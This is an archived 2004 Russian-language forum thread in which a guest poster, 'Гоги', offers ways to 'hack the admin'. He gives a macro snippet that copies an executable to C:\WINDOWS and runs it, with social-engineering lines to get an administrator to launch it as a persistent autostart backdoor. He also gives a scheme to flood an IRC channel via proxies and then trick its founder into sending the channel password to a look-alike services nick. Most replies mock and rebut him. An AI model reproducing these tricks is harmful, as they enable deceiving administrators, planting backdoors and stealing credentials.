Logo Море(!) аналитической информации!
IT-консалтинг Software Engineering Программирование СУБД Безопасность Internet Сети Операционные системы Hardware
Архив форумов ЦИТФорума
Море(!) вопросов - Море(!) ответов
 
 FAQFAQ   ПоискПоиск   ПользователиПользователи   ГруппыГруппы   РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 
Как правильно задавать вопросы

Ломаем Админа !

 
Перейти:  
Этот форум закрыт, вы не можете писать новые сообщения и редактировать старые.   Эта тема закрыта, вы не можете писать ответы и редактировать сообщения.    Список форумов Архив форумов ЦИТФорума -> Сети
Предыдущая тема :: Следующая тема  
Автор Сообщение
Гоги
Гость





СообщениеДобавлено: Ср Авг 04 2004 13:28    Заголовок сообщения: Ломаем Админа ! Ответить с цитатой

Можно написать макрос в Word'e или сделать *.exe файл вот так :

FileCopy "J:studentsst12proga.exe", "C:WINDOWSproga.exe" ' у Админов всегда С: открыт.
Shell ("C:WINDOWSproga.exe") ???
Далее ты идешь к админу и говоришь что хочешь... главное чтоб он запусти эту прогу или Word документ. Ну я говорил, что у меня документ не открывается появляется сообщение что "нужны права Администратора" ну админ и запустил его .
Ну там сами придумаете чего сказать админу там например у меня Прога какая-то появилась подозрительная.
Теперь когда прога proga.exe лежит у админа на жестком, прописана в автозагрузку, и
каждые 1 или 5 минут (я сделал 3 минуты) запускает прогу pusk.exe из твоей папки у тебя появляется вполне нормальный доступ ко всем папкам и к компу админа. Доступ напоминает работу в DOS’e.
Я планирую сдесь опубликовать еще несколько способов самого варварского взлома админских компов . Юнные хакеры - учитесь !
Вернуться к началу
Arkov



Зарегистрирован: 01.11.2002
Сообщения: 622

СообщениеДобавлено: Ср Авг 04 2004 13:38    Заголовок сообщения: Ответить с цитатой

забавно,
а у тебя в родственниках нет никого с именем Гоша?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Nicola



Зарегистрирован: 20.12.2003
Сообщения: 606

СообщениеДобавлено: Ср Авг 04 2004 21:34    Заголовок сообщения: Ответить с цитатой

Ребята, держите меня семеро, я валялся! Laughing
Ну это уже не в какие рамки не лезет!
Ну сколько можно считать нас за таких же как вы???
Ну это же глупо! Ну хорошо, почему же админы получают зарплату за работу с сетью, а не вы? Ну что же за кошмар! Ну хорошо, а фаер вол на что?
Смотрит админ что что-то долбится куда-то и видит что это гоги решил ему поднасрать, прекрасно, он достаёт свой запылившийся винчестер и идет драть его во все дыхательные и т.п........

Класс... Что скажешь юзверь гоги?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
and3008



Зарегистрирован: 12.10.2001
Сообщения: 14893
Откуда: Н.Новгород

СообщениеДобавлено: Ср Авг 04 2004 22:33    Заголовок сообщения: Ответить с цитатой

Гоги, если ты тупой, то не считай, что админы тоже тупые.

Подсказываю в какую сторону копать. Читай MSDN на предмет "как скрыть прогу из списка запущенных процессов".

Без этого твоя прога мягко говоря тогось... ДеЦкая просто.
Laughing
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
vvt



Зарегистрирован: 20.05.2004
Сообщения: 686

СообщениеДобавлено: Чт Авг 05 2004 10:03    Заголовок сообщения: Re: Ломаем Админа ! Ответить с цитатой

Гоги писал(а):
Админов всегда С: открыт!


Мне вот это место особенно понравилось Smile
Сегодня вообще богатый денек на "кулхацкеров" Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
jana



Зарегистрирован: 08.01.2004
Сообщения: 48

СообщениеДобавлено: Пт Авг 06 2004 14:56    Заголовок сообщения: Ответить с цитатой

Надо же, до чего обнаглели, поразиты !
Безграмотные, но наглые !!!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
vvt



Зарегистрирован: 20.05.2004
Сообщения: 686

СообщениеДобавлено: Пт Авг 06 2004 16:18    Заголовок сообщения: Ответить с цитатой

Ян, неужели тебя все юзеры так достали, что ты их только паразитами и зовешь? Smile Или ты где то перевод такой вычитала? Very Happy
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
ALEX_SE



Зарегистрирован: 30.11.2003
Сообщения: 1043
Откуда: Энгельс, Саратовская обл.

СообщениеДобавлено: Пт Авг 06 2004 19:59    Заголовок сообщения: Ответить с цитатой

О кретинизм блин...
Да я хоть 100 таких прог запущу - бестолку. Потому что не имею ни локальных прав, ни тем более доменных при повседневной работе... До какой степени можно считать всех админов кретинами? Тем паче что обнаружить данную шнягу (особливо в автозагрузке) - нефиг делать... ак же это достало... бездельники которые ни за что получают деньги занимаясь вместо работы всякой хренотой еще и работать мешают...
Автор - успокойся. Я понимаю что тебе очень глубоко наплевать на работоспособность сетки, на сохранность инфы которую целыми днями вбивали твои же коллеги... А админу - не наплевать. Он не хочет чтобы у людей были проблемы. И не надо считать себя умнее - это не так.
Встань на мое место - дохрена ты наработаешь? Кажется да, но это до первого отказа например дисков на серваках... Что делать бум? Что такое бакап, стример, RAID, HotSpare, HotSwap, не знаем? И что тогда, гений Вы наш? Может Вы поможете другим на форуме? Или что - проблемы какие-то?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
vvt



Зарегистрирован: 20.05.2004
Сообщения: 686

СообщениеДобавлено: Пт Авг 06 2004 22:15    Заголовок сообщения: Ответить с цитатой

Что ж ты горячишься так? Smile Нервные клетки не восстанавливаются Wink
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
ALEX_SE



Зарегистрирован: 30.11.2003
Сообщения: 1043
Откуда: Энгельс, Саратовская обл.

СообщениеДобавлено: Пт Авг 06 2004 23:50    Заголовок сообщения: Ответить с цитатой

Не, это я спокойный Smile Если бы я горячился - не стал бы сюда писать Smile Жалеючи чуства и вероисповединие остальных Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Гоги URL
Гость





СообщениеДобавлено: Сб Авг 07 2004 11:56    Заголовок сообщения: Ответить с цитатой

Вот еще два способа захвата ламмерских (Админских ) каналов .
Здрасте. Ясен пень, что вам, – как и многим другим вашим знакомым, хоть раз хотелось захватить какойнить канальчик Алексея Пездрецова. А я вам сейчас постараюсь в этом помочь.
Что мы имеем? Не, не Машку из соседнего подъезда Wink Мы имеем (выражение то, какое) желание поиметь (опять оно Wink какой ни будь достаточно посещаемый канал, причём в сервисной сети . И для этого, в принципе, у нас с тобой есть все шансы.
Заходишь на канал. Например это будет #love Smile Притаись и жди появления фаундера канал. Ага, – объект появился. Тут нам нужно узнать насколько хорошо чел разбирается в сервисах сети и в ирке в целом. Только не нужно спрашивать у него как ник регить или ещё чего, запомни, ты должен произвести впечатление человека, достаточно хорошо разбирающегося в irc и в сервисах данной сети в частности. Если в течение разговора обнаружено, что чел в сервисах сечёт на достаточно низком уровне (то бишь lamer Detected). На время оставляешь его в покое. А сам в это время готовишь какуюнить тупую, – но достаточно противную для него и для всех остальных посетителей атаку. Например, флуд. Только флудить желательно через проксю – да бы бан, на свой настоящий хост, нас очень даже не обрадует. То есть, просто зайди вторым клиентом через прокси, погадь как нить на канале, а когда получишь бан, – меняй проксю и продолжай сначала. Не обязательно устраивать флуд, я думаю, ты и сам сообразишь, как можно поднять шмон на канале. Когда увидишь что чел конкретно взбесился и не знает, как избавиться от хамских выходок малолеток. Ты любезно предоставишь ему свою помощь. Wink

Залазишь к нему в приват и говоришь. Что ж ты спишь, а ну пиши быстрее /msg Servicess #love password PROTECT ON (в место password он должен написать пароль от канала). И объясняешь, что эта команда включит защиту от таких придурков на канале. Понял фишку?

Вот такими нехитрыми приемчиками можно ломать ломмеров . (То есть , извиняюсь , Админов .)
В следующий раз мы с вами , дорогие чайники , желающие подпортить настроение Админу , поговорим об масштабной атаке на всю сеть c гордым названием internet .
Я делюсь с вами своим бесценным опытом в надежде , что вы станете настоящей занозой в жопе Админа .(А если админ - женщина ?
Тогда ломать её вдвойне приятней ! )
Ян , а Ян ты что там администрируешь , дорогая ?
Вернуться к началу
ALEX_SE



Зарегистрирован: 30.11.2003
Сообщения: 1043
Откуда: Энгельс, Саратовская обл.

СообщениеДобавлено: Сб Авг 07 2004 12:27    Заголовок сообщения: Ответить с цитатой

Я вот задумался - почему возникает подобный бред на форумах?
Я пор мессаг Гоги как Вы поняли Smile К сожалению на пустом месте он не возникает... Действительно, сейчас хватает "админов" которых можно накрыть вот таким вот образом... И так думают про остальных админов, действительно нормальных. Не очень приятная картина получается Sad

P.S. Модератор - если будите стирать мессаг Гоги - сотрите и мою, а то нелогично будет Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Star Wolf
Гость





СообщениеДобавлено: Сб Авг 07 2004 12:59    Заголовок сообщения: Ответить с цитатой

Я валяюсь... и блин слов нет.. Гоги ты где такой шняги начитался ?
Вернуться к началу
Spencer



Зарегистрирован: 08.08.2004
Сообщения: 54
Откуда: Moscow

СообщениеДобавлено: Вс Авг 08 2004 03:03    Заголовок сообщения: Ответить с цитатой

Гоги, поделись "военной тайной", тебе много паролей прислали....?
И еще.... а НАФИГА они тебе здались-то........ Question

Или ты думаешь, что один читаль умеешь, а все остальные только писать?

Позволь высказать предположение.... В седующем посте ты просвятишь нас, как создать DOS-араку на сервер....? и конечно, с использоданием proxy-сервера.... из локальной сети....? с утверждением, что админ не догадается, что это сделал ты..... Razz

Бред....... Rolling Eyes
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
ALEX_SE



Зарегистрирован: 30.11.2003
Сообщения: 1043
Откуда: Энгельс, Саратовская обл.

СообщениеДобавлено: Вс Авг 08 2004 11:04    Заголовок сообщения: Ответить с цитатой

Я вот от чего свалился со стула:

Цитата:
В следующий раз мы с вами , дорогие чайники , желающие подпортить настроение Админу , поговорим об масштабной атаке на всю сеть c гордым названием internet .


Нифига себе заявление Mr. Green

P.S. Прошлогодняя атака на рутовые DNS-сервера - я кажется знаю чьих рук дело Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Гость






СообщениеДобавлено: Пн Авг 09 2004 02:00    Заголовок сообщения: Ответить с цитатой

Цитата:
P.S. Прошлогодняя атака на рутовые DNS-сервера - я кажется знаю чьих рук дело


Угу, юзер-одиночка, с домашнего компа, подключенный через dial-up Very Happy
Вернуться к началу
Arkov



Зарегистрирован: 01.11.2002
Сообщения: 622

СообщениеДобавлено: Пн Авг 09 2004 05:24    Заголовок сообщения: Ответить с цитатой

пока вы тут флеймом занимаетесь я делом занимаюсь - окуржил себя фаерволами в кабинете в два ряда по 6 компов в каждом и от сети свой комп отключил, а шнурок сетевой проглотил - а то ГОГИ похоже и вправду не шутит...........

Ховаемся!!!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
ALEX_SE



Зарегистрирован: 30.11.2003
Сообщения: 1043
Откуда: Энгельс, Саратовская обл.

СообщениеДобавлено: Пн Авг 09 2004 07:42    Заголовок сообщения: Ответить с цитатой

То что ты поставил 6 вайволов, это конечно здорово. А теперь можно глупый вопрос?
Куда подключены все эти файрволы (в смысле во внешнюю сеть) Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
vvt



Зарегистрирован: 20.05.2004
Сообщения: 686

СообщениеДобавлено: Пн Авг 09 2004 10:33    Заголовок сообщения: Ответить с цитатой

ALEX_SE писал(а):
P.S. Прошлогодняя атака на рутовые DNS-сервера - я кажется знаю чьих рук дело Smile


Ты его переоценивашь - он их даже не найдет Smile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Arkov



Зарегистрирован: 01.11.2002
Сообщения: 622

СообщениеДобавлено: Пн Авг 09 2004 10:47    Заголовок сообщения: Ответить с цитатой

ALEX_SE писал(а):
То что ты поставил 6 вайволов, это конечно здорово. А теперь можно глупый вопрос?
Куда подключены все эти файрволы (в смысле во внешнюю сеть) Smile


эти фаерволы тож никуда не подключены, я ими просто обложился и сижу чтоб меня даже видно небыло, зато чувствую себя спокойно и в безопасности....
ау ГОГИ, попробуй сломать!!!!!!!!!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
--= Eagle =--



Зарегистрирован: 23.03.2004
Сообщения: 977
Откуда: Украина, Житомир

СообщениеДобавлено: Пн Авг 09 2004 15:15    Заголовок сообщения: Ответить с цитатой

Я тут другое дело замутил - поставил в брендмаеэре бан на пользователя с именем Гоги в его локальной сети, которое вычисляется по его локальному IP. Как - не скажу, а то ещё обход какой-то мудрённый придумает. Cool

ЗЫ. Laughing Laughing Laughing
_________________
Информация должна быть общедоступной!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
Spencer



Зарегистрирован: 08.08.2004
Сообщения: 54
Откуда: Moscow

СообщениеДобавлено: Вс Авг 15 2004 20:54    Заголовок сообщения: Ответить с цитатой

--= Eagle =--
Цитата:
....поставил в брендмаеэре бан на пользователя с именем Гоги в его локальной сети...


Злые Вы все, а как же он теперь DNS сервера ломать будет....
Лишили человека любимого занятия..... Twisted Evil Twisted Evil Twisted Evil
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Показать сообщения:   
Этот форум закрыт, вы не можете писать новые сообщения и редактировать старые.   Эта тема закрыта, вы не можете писать ответы и редактировать сообщения.    Список форумов Архив форумов ЦИТФорума -> Сети Часовой пояс: GMT + 3
Страница 1 из 1

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах


Powered by phpBB © 2001, 2002 phpBB Group
Русская поддержка phpBB

 

IT-консалтинг Software Engineering Программирование СУБД Безопасность Internet Сети Операционные системы Hardware

Информация для рекламодателей PR-акции, размещение рекламы — adv@citforum.ru,
тел. +7 495 6608306, ICQ 232284597
Пресс-релизы — pr@citforum.ru
Послать комментарий
Информация для авторов
This Web server launched on February 24, 1997
Copyright © 1997-2000 CIT, © 2001-2006 CIT Forum
Внимание! Любой из материалов, опубликованных на этом сервере, не может быть воспроизведен в какой бы то ни было форме и какими бы то ни было средствами без письменного разрешения владельцев авторских прав. Подробнее...